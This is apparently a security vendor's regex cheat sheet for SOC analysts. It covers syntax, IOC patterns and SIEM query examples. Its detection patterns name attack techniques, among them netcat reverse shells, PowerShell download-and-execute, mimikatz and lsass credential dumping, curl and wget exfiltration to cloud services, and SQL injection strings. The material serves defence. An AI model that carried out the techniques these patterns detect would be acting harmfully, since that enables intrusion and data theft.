Regular expressions (regex) are essential tools for cybersecurity professionals, enabling powerful pattern matching and text manipulation across SIEM platforms, log analysis systems, incident response workflows, and security automation. This comprehensive regex cheat sheet provides practical examples and patterns specifically designed for security operations, threat hunting, and digital forensics investigations.
What is Regex (Regular Expressions)?
Regular expressions (regex) are sequences of characters that define search patterns, used for pattern matching, text parsing, data validation, and string manipulation. In cybersecurity, regex enables SOC analysts to quickly search through massive volumes of security logs, identify indicators of compromise, detect anomalies, and automate threat detection across diverse data sources.
Why Security Professionals Need Regex:
- Log analysis: Parse millions of security events to find specific patterns
- Threat hunting: Search for IOCs (indicators of compromise) across log sources
- SIEM queries: Write efficient detection rules in Microsoft Sentinel, Splunk, Elastic
- Incident response: Extract relevant data during investigations
- Automation: Build scripts for security workflows and response actions
- Data validation: Ensure input meets security requirements
Basic Regex Syntax
Character Matchers
| Pattern | Description | Security Example |
|---|---|---|
. |
Matches any single character except newline | error.log matches "error1log", "errorAlog" |
\d |
Matches any digit (0-9) | port \d+ finds "port 443", "port 8080" |
\D |
Matches any non-digit | \D+ extracts text between numbers |
\w |
Matches word characters (letters, digits, underscore) | \w+@\w+\.com matches simple emails |
\W |
Matches non-word characters | Useful for finding special characters in logs |
\s |
Matches whitespace (space, tab, newline) | Failed\s+login matches "Failed login" |
\S |
Matches non-whitespace | \S+ extracts tokens without spaces |
Quantifiers
| Pattern | Description | Security Example |
|---|---|---|
* |
Matches 0 or more times | error.* matches "error", "error: timeout" |
+ |
Matches 1 or more times | \d+ matches "123", "4567" but not empty |
? |
Matches 0 or 1 time (optional) | https?:// matches "http://" or "https://" |
{n} |
Matches exactly n times | \d{4} matches 4-digit years "2026" |
{n,} |
Matches n or more times | [A-Z]{3,} matches 3+ uppercase letters |
{n,m} |
Matches between n and m times | \d{2,4} matches 2-4 digit numbers |
Anchors and Boundaries
| Pattern | Description | Security Example |
|---|---|---|
^ |
Matches start of line/string | ^ERROR finds lines starting with "ERROR" |
$ |
Matches end of line/string | \.exe$ finds lines ending with ".exe" |
\b |
Word boundary | \broot\b matches "root" but not "groot" |
\B |
Non-word boundary | \Broot\B matches "groot" but not "root" |
Cybersecurity-Specific Regex Patterns
IP Address Patterns
Basic IPv4:
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
Matches: 192.168.1.1, 10.0.0.1, 255.255.255.255
Strict IPv4 (validates 0-255 range):
\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
IPv6:
([0-9a-fA-F]{0,4}:){7}[0-9a-fA-F]{0,4}
Email Address Patterns
Basic Email:
[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}
Advanced Email (RFC compliant):
(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])
URL Patterns
Basic URL:
https?://[^\s]+
Complete URL with validation:
https?://(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&//=]*)
Suspicious URL patterns (phishing detection):
https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}|https?://.*\.(?:tk|ml|ga|cf|gq)\b
File Path Patterns
Windows paths:
[a-zA-Z]:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*
Matches: C:\Windows\System32\cmd.exe
Linux paths:
\/(?:[^\/\s]+\/)*[^\/\s]+
Matches: /var/log/auth.log
Suspicious temp file execution:
[a-zA-Z]:\\(?:Windows\\Temp|Users\\[^\\]+\\AppData\\Local\\Temp)\\.*\.exe
Hash Patterns (IOC Detection)
MD5:
\b[a-fA-F0-9]{32}\b
SHA1:
\b[a-fA-F0-9]{40}\b
SHA256:
\b[a-fA-F0-9]{64}\b
Authentication Patterns
Failed login attempts:
(?i)(failed|failure|invalid).*(?:login|authentication|password|credential)
Privilege escalation:
(?i)(sudo|runas|elevate|privilege).*(?:granted|success|elevated)
Account lockout:
(?i)account.*(?:locked|disabled|suspended)
Malicious Command Patterns
PowerShell obfuscation:
powershell.*(?:-e|-enc|-encodedcommand|-w\s+hidden)
Command and Control (C2) indicators:
(?:powershell|cmd|wscript).*(?:downloadstring|downloadfile|invoke-expression|iex)
Suspicious network commands:
(?:netcat|nc|ncat).*(?:-e|-c\s+[/\\]bin[/\\](?:bash|sh))
Regex in SIEM Platforms
Microsoft Sentinel (KQL) Regex Examples
Find suspicious process execution:
SecurityEvent
| where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe'
Detect potential phishing emails:
EmailEvents
| where Subject matches regex '(?i)(urgent|action required|verify account|suspended)'
Identify lateral movement:
SecurityEvent
| where EventID == 4624
| where LogonType == 3
| where Account matches regex '.*\\\\admin.*'
Splunk Regex Examples
Extract failed SSH attempts:
source="/var/log/auth.log" "Failed password"
| rex field=_raw "Failed password for (?<user>\w+) from (?<src_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
Parse Windows Security logs:
source="WinEventLog:Security" EventCode=4625
| rex field=Message "Account Name:\s+(?<failed_account>\S+)"
Advanced Regex Techniques
Lookahead and Lookbehind
| Pattern | Description | Example |
|---|---|---|
(?=...) |
Positive lookahead | password(?=\d) matches "password" only if followed by digit |
(?!...) |
Negative lookahead | user(?!admin) matches "user" not followed by "admin" |
(?<=...) |
Positive lookbehind | (?<=admin:)\w+ matches username after "admin:" |
(?<!...) |
Negative lookbehind | (?<!test)\w+@domain\.com excludes test accounts |
Groups and Capturing
| Pattern | Description | Security Use Case |
|---|---|---|
(...) |
Capturing group | Extract specific fields from logs |
(?:...) |
Non-capturing group | Group patterns without memory overhead |
(?<name>...) |
Named capturing group | (?<ip>\d+\.\d+\.\d+\.\d+) names the capture |
\1, \2 |
Backreference | (\w+)\s+\1 finds repeated words |
Common Regex Flags
| Flag | Description | Security Application |
|---|---|---|
i |
Case insensitive | Match "ERROR", "error", "Error" equally |
m |
Multiline (^ and $ match line breaks) | Parse multi-line log entries |
s |
Dotall (. matches newlines) | Search across multiple log lines |
g |
Global (find all matches) | Extract all IPs from text |
x |
Extended (ignore whitespace, allow comments) | Write readable complex patterns |
Regex Performance Tips for Security Operations
Optimization Best Practices:
- Use anchors: Start patterns with ^ to avoid scanning entire strings
- Be specific: Use \d instead of . when you only need digits
- Avoid catastrophic backtracking: Don't use nested quantifiers like (a+)+
- Use non-capturing groups: (?:...) when you don't need to extract data
- Compile patterns: Pre-compile frequently used regex in scripts
- Limit scope: Use boundaries \b to prevent unnecessary matching
- Test performance: Benchmark regex on sample logs before production use
Practical Threat Hunting Regex Examples
Detect Credential Dumping
(?i)(mimikatz|lsadump|sekurlsa|logonpasswords|procdump.*lsass)
Identifies tools and commands associated with credential theft
Find Ransomware Indicators
(?i)(\.encrypted|\.locked|\.crypto|_readme\.txt|ransom.*note|pay.*bitcoin)
Matches common ransomware file extensions and ransom notes
Identify Data Exfiltration
(?:curl|wget|powershell).*(?:pastebin|dropbox|mega|drive\.google).*(?:upload|put|post)
Detects commands uploading data to cloud services
Detect Persistence Mechanisms
(?i)(?:HKLM|HKCU)\\(?:Software\\Microsoft\\Windows\\CurrentVersion\\Run|RunOnce)
Finds registry keys commonly used for persistence
Find SQL Injection Attempts
(?i)(\bunion\b.*\bselect\b|\bor\b.*1\s*=\s*1|'.*--|\bexec\s*\()
Identifies common SQL injection patterns in web logs
Testing and Debugging Regex
Recommended Regex Testing Tools:
- Regex101.com: Excellent for testing with explanations and performance metrics
- RegExr.com: Interactive testing with community patterns
- RegexBuddy: Desktop application for complex pattern development
- Python re module: Test patterns in your security scripts
- Online Regex Testers: Quick validation before SIEM deployment
Common Regex Mistakes in Security Operations
| Mistake | Problem | Solution |
|---|---|---|
| Greedy matching | .* matches too much |
Use lazy .*? or specific patterns |
| Missing escapes | . matches any character | Escape special chars: \. |
| No anchors | Pattern matches anywhere | Use ^ and $ for specific positions |
| Inefficient patterns | Slow query performance | Optimize with specific character classes |
| Forgetting flags | Case-sensitive when shouldn't be | Add (?i) or /i flag for case-insensitive |
Regex in Security Automation Scripts
Python Example: Extract IPs from Logs
import re
# Read security log
with open('firewall.log', 'r') as f:
content = f.read()
# Extract all IPs
ip_pattern = r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'
ips = re.findall(ip_pattern, content)
# Count unique source IPs
unique_ips = set(ips)
print(f"Found {len(unique_ips)} unique IP addresses")
PowerShell Example: Parse Windows Event Logs
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4625]]" |
Select-Object -First 100 |
Where-Object {$_.Message -match 'Account Name:\s+(?<user>\S+)'} |
Select-Object TimeCreated, @{N='User';E={$Matches.user}}
Frequently Asked Questions
What is regex used for in cybersecurity?
Regex in cybersecurity is used for log analysis, threat detection, pattern matching in SIEM tools, parsing security events, validating input, detecting malicious patterns, analyzing network traffic, and automating incident response workflows. SOC analysts use regex daily to search through vast amounts of log data for indicators of compromise, suspicious activity, and security anomalies.
What does .* mean in regex?
In regex, .* means match any character (the dot .) zero or more times (the asterisk *). This creates a wildcard pattern that matches everything including empty strings. For example, 'error.*failure' matches 'error: system failure', 'error connection failure', or just 'errorfailure'. In security contexts, .* is commonly used in log queries to find events with specific keywords regardless of what appears between them, though it should be used carefully to avoid performance issues.
How do I match an IP address with regex?
To match an IP address with regex, use: \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b for a basic pattern that matches any number sequence in IP format, or \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b for strict validation that ensures each octet is between 0-255. This pattern is essential for security log analysis, identifying source/destination IPs in firewall logs, detecting suspicious connection patterns in network traffic, and extracting IPs during forensic investigations.
What is the difference between * and + in regex?
In regex, * (asterisk) matches zero or more occurrences, while + (plus) matches one or more occurrences. For example: 'a*' matches '', 'a', 'aa', 'aaa' (including empty string), but 'a+' only matches 'a', 'aa', 'aaa' (requires at least one 'a'). In security contexts, use + when you need to ensure a pattern appears at least once, such as when searching for actual error messages (ERROR.+) rather than empty fields, or when extracting usernames that must contain at least one character (\w+).
How do I use regex in Microsoft Sentinel?
In Microsoft Sentinel, use regex with the "matches regex" operator in KQL (Kusto Query Language). Example: SecurityEvent | where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe' searches for suspicious executables running from Windows temp folders. Regex in Sentinel enables advanced threat hunting, log parsing, custom detection rules, and correlation of security events across your environment for comprehensive threat detection. You can also use extract() and parse() functions with regex patterns for detailed log field extraction.
Conclusion: Master Regex for Security Operations
Regular expressions are indispensable tools for modern cybersecurity professionals. Whether you're a SOC analyst hunting threats in Microsoft Sentinel, a forensic investigator parsing evidence, or a security engineer building detection rules, mastering regex dramatically increases your efficiency and effectiveness.
This cheat sheet provides patterns and techniques specifically designed for security operations, but regex mastery comes through practice. Start with simple patterns, test thoroughly, and gradually build more complex expressions as your skills develop. Remember to optimize for performance, inefficient regex can impact SIEM query times and analysis speed during critical incident response situations.
subrosa's SOC team uses advanced regex patterns daily in Microsoft Sentinel for threat detection, log analysis, and automated response. Contact us to learn how our security experts can help optimize your detection rules and threat hunting workflows.